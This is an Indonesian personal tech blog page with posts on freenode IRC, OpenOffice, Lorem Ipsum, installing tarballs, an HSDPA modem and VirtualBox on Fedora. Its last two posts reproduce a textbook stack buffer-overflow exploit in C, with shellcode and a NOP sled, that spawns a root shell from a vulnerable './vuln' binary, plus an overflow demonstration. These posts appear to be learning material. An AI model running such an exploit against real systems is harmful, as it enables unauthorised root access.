Recent Comments

Connect to freenode IRC

Buat teman-teman yang ingin mengkoneksikan diri ke FreeNode tapi tidak punya aplikasi seperti Xchat , atau tidak ingin install plugins Mozilla ( https://addons.mozilla.org/id/firefox/addon/chatzilla/ ) silahkan gunakan webchat.freenode.net,

dan jika anda seorang Fedora Ambasador silahkan baca-baca disini https://fedoraproject.org/wiki/Communicate/IRCHowTo

Oracle Kembalikan Open Office ke Komunitas

Setelah mengambil alih kendali akan apa yang dianggap sebagai musuh dari Microsoft Office melalui akuisisi dari Sun Microsystems,  Oracle akhirnya memutuskan untuk mengembalikan Open Office menjadi proyek yang dipimpin oleh komunitas.  Sebelumnya, keterlibatan Oracle dengan Open Office mengantarkan pembuatan The Document Foundation dan proyek Libre Office untuk berjaga-jaga jika Oracle menjadikan Open Office proyek closed source.

Ketika Libre Office makin menguat, dukungan komunitas terhadap Open Office menciut. Banyak distribusi Linux, termasuk Ubuntu Canonical dan Fedora Red Hat beralih ke Libre Office, bukan Open Office. Oracle memperhatikan hal ini dan mengatakan bahwa Open Office akan dikelola oleh sebuah organisasi berbasis non-komersial

Keputusan Oracle untuk mengalihkan Open Office ke proyek berbasis komunitas tidak berarti perusahaan akan berhenti memberikan kontribusi. Dalam pernyataan yang dirilis Oracle, Edward Screven,  arsitek korporat pemimpin perusahaan mengatakan, “Kami berniat untuk langsung bekerja dengan para anggota komunitas untuk melanjutkan kesuksesan Open Office. Oracle akan terus mendukung adopsi format dokumen berbasis standar terbuka, seperti Open Document Format.”

sumber: http://www.tabloidpcplus.com  (Ditulis pada 25 April 2011 oleh Wiwiek Juwono)

Naskah Lorem Ipsum

tahukan anda kalau Naskah Lorem Ipsum di gunakan pada tahun 45 sebelum masehi, nah yang di pakai sampai sekarang adalah naskah standar yang ada sejak tahun 1500an :) saya juga baru tau loh heheheh, berikut naskahnya…

“Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.”

nah silahkan disimak naskah dari tahun ketahun … di copast dari http://lipsum.com/

Naskah Lorem Ipsum standar yang digunakan sejak tahun 1500an

“Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.”
Bagian 1.10.32 dari “de Finibus Bonorum et Malorum”, ditulis oleh Cicero pada tahun 45 sebelum masehi

“Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?”

Terjemahan tahun 1914 oleh H. Rackham

“But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and I will give you a complete account of the system, and expound the actual teachings of the great explorer of the truth, the master-builder of human happiness. No one rejects, dislikes, or avoids pleasure itself, because it is pleasure, but because those who do not know how to pursue pleasure rationally encounter consequences that are extremely painful. Nor again is there anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a trivial example, which of us ever undertakes laborious physical exercise, except to obtain some advantage from it? But who has any right to find fault with a man who chooses to enjoy a pleasure that has no annoying consequences, or one who avoids a pain that produces no resultant pleasure?”

Bagian 1.10.33 dari “de Finibus Bonorum et Malorum”, ditulis oleh Cicero pada tahun 45 sebelum masehi

“At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus. Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.”

Terjemahan tahun 1914 oleh H. Rackham

“On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.”

Apakah Lorem Ipsum itu?
Lorem Ipsum adalah contoh teks atau dummy dalam industri percetakan dan penataan huruf atau typesetting. Lorem Ipsum telah menjadi standar contoh teks sejak tahun 1500an, saat seorang tukang cetak yang tidak dikenal mengambil sebuah kumpulan teks dan mengacaknya untuk menjadi sebuah buku contoh huruf. Ia tidak hanya bertahan selama 5 abad, tapi juga telah beralih ke penataan huruf elektronik, tanpa ada perubahan apapun. Ia mulai dipopulerkan pada tahun 1960 dengan diluncurkannya lembaran-lembaran Letraset yang menggunakan kalimat-kalimat dari Lorem Ipsum, dan seiring munculnya perangkat lunak Desktop Publishing seperti Aldus PageMaker juga memiliki versi Lorem Ipsum.

Nah untuk lebih jelasnya, silahkan link ke http://lipsum.com/



Instal tgz file

Sekedar untuk mengingatkan diri sendiri, biasanya saya sering lupa heheheh…

Pertama-tama ada paketnya yang ber extensi .tgz, setelah itu coba elstrak paketnya dulu

$ tar xzvf nama_file.tar.gz

$ cd folder_ekstrak

$ ./configure

$make

Lalu install dengan account root

$ su

# make install

Modem HSDPA

Koneksi internet pada saat ini sudah bisa diakses melalui berbagai media, pada saat ini media wireles selain wifi adalah via GSM sudah banyak di gemari oleh banyak kalangan, terutama karena ke-leluasaanya, dibanding Wifi, semua koneksi internet akan membutuhkan sebuah modulator alias Modem (Modulator de Modulator) atau pengubah frekuensi tertentu menjadi sinyal listrik dan begitu pula sebaliknya.

Provider telekomunikasi saat ini sedang gencar-gencarnya menerapkan teknologi ini, karena di anggap teknologi paling praktis, pada contoh kali ini saya menggunakan …

Modem : Huawey E1550

Provider : Telkomsel Flash

Laptop : Acer 4720 *laptop ku satu-satunya 😀

OS : Fedora 14 *pasti donk :)

Nah setting modem tersebut pada fedora 14, tidak sesusah dan seribet di fedora terdahulu, yang harus setting nauzubillah deh .. kali ini cukup memasang modem tersebut pada port USB tunggu beberapa saat akan muncul verifikasi pin kartu default 1234 jika belum dirubah.

nah setelah terhubung, silahkan melakukan settingan APN Flashnya pada bagian atas ada icon yang berbentuk seperti sinyal, oh yah ini ada simulasi gambar narsis di bawah ini hehehe …

yang saya perlihatkan pada pointer mouse tersebut klik 2x saja, nah akan muncul gambar seperti ini ..

isikan data-datanya seperti biasa,

Connetion Name : isi nama koneksi

Number : *99#

User dan password : kosongin saja

APN : internet (default untuk flash volumebase)

Pin : 1234 (default bawaan simcard)

lalu di Aplay

Nah, silahkan lihat gambar narsis FB aku lagi, pada bagian Data Seluler silahkan di Conneck kan, Nah mudahkan, Selamat berselancar dengan Telkomsel Flash hanya dari Telkomsel *hahahah ,… dibayar brapa nih iklannya om Telkomsel 😛

Fedora 15 alpha rilis

Oracle VirtualBox 4 on Fedora

Repost dari tulisan Dichi Al Faridi – 22 January 2011 – alfaridi.info

VirtualBox 4 is only available on Linux at this time. But installing VirtualBox 4 on Fedora is quite easy. You just follow this simple step and you will have VirtualBox 4 on your Fedora.

If you don’t have VirtualBox repository, add it first. It could be done by creating a file named VirtualBox.repo at /etc/yum.repos.d/ . Fill that file with this :

1 [virtualbox]
2 name=VirtualBox
3 baseurl=http://download.virtualbox.org/virtualbox/rpm/fedora/$releasever/$basearch
4 enabled=1
5 gpgcheck=1
6 gpgkey=http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc

After done that step, you could install it with yum as root.

1 yum install VirtualBox-4.0 kernel-header

Please be sure you type VirtualBox not virtualbox, because Fedora has open source virtual box version available on Fedora official repository.

Done. Enjoy Fedora. :)

Rhythm Video Game

Dengan game ini Anda dapat memilih dari koleksi besar lagu dan memainkan jenis permainan video di mana Anda mengikuti irama musik dan gerakan anak panah dalam video untuk tekan tombol pada keyboard atau pada bantalan permainan pada saat yang tepat. Semakin akurat Anda menyinkronkan bergerak Anda dengan musik semakin Anda akan mendapatkan imbalan.

Inti dari Stepmania adalah sebuah permainan irama mesin extensible yang mendukung grafis 3D dan dilengkapi dengan editor langkah menulis. Ini adalah bebas dan sumber terbuka dan berjalan pada Linux dan sistem operasi utama. Anda dapat menemukan petunjuk download dan instalasi di situs web proyek.

exploit

arti dalam bahasa indonesia mungkin, memanfaatkan atau menipu atau, pokok nya itu deh 😀 … kegiatan ini sama halnya dengan naik pangkat secara tidak benar yang di tempuh dengan membodoh-bodohi sistem kepegawaian … wekekeke kok sampai kesitu yah Bahh..

berikut contoh nya, sekali lagi ini hanya contoh yah, jangan di coba dirumah, tingkat kegagalannya 100% trus buat apa ada tulisan ini, mari nikmati saja HAHAHA …

#include <stdlib.h>

char shellcode[] =
"x31xc0xb0x46x31xdbx31xc9xcdx80xebx16x5bx31xc0"
"x88x43x07x89x5bx08x89x43x0cxb0x0bx8dx4bx08x8d"
"x53x0cxcdx80xe8xe5xffxffxffx2fx62x69x6ex2fx73"
"x68";

unsigned long sp(void)
{ __asm__("movl %esp, %eax");} 

int main(int argc, char *argv[])
{
   int i, offset;
   long esp, ret, *addr_ptr;
   char *buffer, *ptr;

   offset = 0;
   esp = sp();
   ret = esp - offset;    

printf("Stack pointer (ESP) : 0x%xn", esp);
printf("    Offset from ESP : 0x%xn", offset);
printf("Desired Return Addr : 0x%xn", ret);

 buffer = malloc(600);

 ptr = buffer;
 addr_ptr = (long *) ptr;
 for(i=0; i < 600; i+=4)
 { *(addr_ptr++) = ret; }

 for(i=0; i < 200; i++)
 { buffer[i] = 'x90'; }

 ptr = buffer + 200;
 for(i=0; i < strlen(shellcode); i++)
 { *(ptr++) = shellcode[i]; }

 buffer[600-1] = 0;

 execl("./vuln", "vuln", buffer, 0);

 free(buffer);

   return 0;
}

//Setelah itu compile lah listing di atas, dan abadikan perbuatan mu :P

$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xbffff978
   Offset from ESP : 0x0
Desired Return Addr : 0xbffff978
sh-2.05a# whoami
root
sh-2.05a#

Buffer OverFlows

Menurutku seperti ini, kegiatan tersebut di analogikan seperti ini, Jika ada seorang atlit marathon, yang di suruh lari sampai 50 kilo-meter, setibanya di Finis, sang pelari di gebukin oleh jurinya, kira-kira apa kah yang terjadi :) pikirkan sendiri 😛 preettt.

mari kita simak, trik ini saya tulis ulang dari sebuah buku hacking, yang penulisnya bukan orang indo 😀 . jangan di peraktekkan yah, ini hanya contoh 😀

overflow.c

void overflow_function (char *str)
{
   char buffer[20];

   strcpy(buffer, str);
}

int main()
{
   char big_string[128];
   int i;

   for(i=0; i < 128; i++) // di bagian ini akan terjadi looping sebanyak 128 kali
   {
      big_string[i] = 'A'; // nilai 'A' akan di sisipkan ke string i, eh ... big_string :D
   }
   overflow_function(big_string);
   exit(0);
}
//nah ... apakah yang terjadi dengan baris-baris di atas, silahkan di compile dengan compiler c kesukaan anda :P
$ gcc -o overflow overflow.c
$ ./overflow
Segmentation fault